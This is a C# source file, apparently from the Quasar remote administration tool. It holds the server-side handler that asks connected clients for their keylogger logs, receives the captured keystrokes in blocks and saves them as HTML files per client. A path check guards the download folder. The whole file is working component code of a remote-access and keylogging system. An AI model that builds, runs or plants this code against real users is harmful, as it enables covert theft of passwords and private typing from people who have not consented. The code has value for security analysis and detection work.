using Quasar.Common.IO; using Quasar.Common.Messages; using Quasar.Common.Networking; using Quasar.Server.Core.Helper; using Quasar.Server.Core.Networking; using System.IO; namespace Quasar.Server.Core.Messages { public class KeyloggerHandler : MessageProcessorBase { /// /// The client which is associated with this keylogger handler. /// private readonly Client _client; /// /// Path to the base download directory of the client. /// private readonly string _baseDownloadPath; /// /// Initializes a new instance of the class using the given client. /// /// The associated client. public KeyloggerHandler(Client client) : base(true) { _client = client; _baseDownloadPath = Path.Combine(client.Value.DownloadDirectory, "Logs\\"); } /// public override bool CanExecute(IMessage message) => message is GetKeyloggerLogsResponse; /// public override bool CanExecuteFrom(ISender sender) => _client.Equals(sender); /// public override void Execute(ISender sender, IMessage message) { switch (message) { case GetKeyloggerLogsResponse logs: Execute(sender, logs); break; } } /// /// Retrieves the keylogger logs and begins downloading them. /// public void RetrieveLogs() { _client.Send(new GetKeyloggerLogs()); } private void Execute(ISender client, GetKeyloggerLogsResponse message) { if (message.FileCount == 0) { OnReport("Ready"); return; } // don't escape from download directory if (FileHelper.CheckPathForIllegalChars(message.Filename)) { // disconnect malicious client client.Disconnect(); return; } if (!Directory.Exists(_baseDownloadPath)) Directory.CreateDirectory(_baseDownloadPath); string downloadPath = Path.Combine(_baseDownloadPath, message.Filename + ".html"); FileSplit destFile = new FileSplit(downloadPath); destFile.AppendBlock(message.Block, message.CurrentBlock); if (message.CurrentBlock + 1 == message.MaxBlocks) { try { File.WriteAllText(downloadPath, FileHelper.ReadLogFile(downloadPath)); } catch { } if (message.Index == message.FileCount) { OnReport("Ready"); } } } protected override void Dispose(bool disposing) { } } }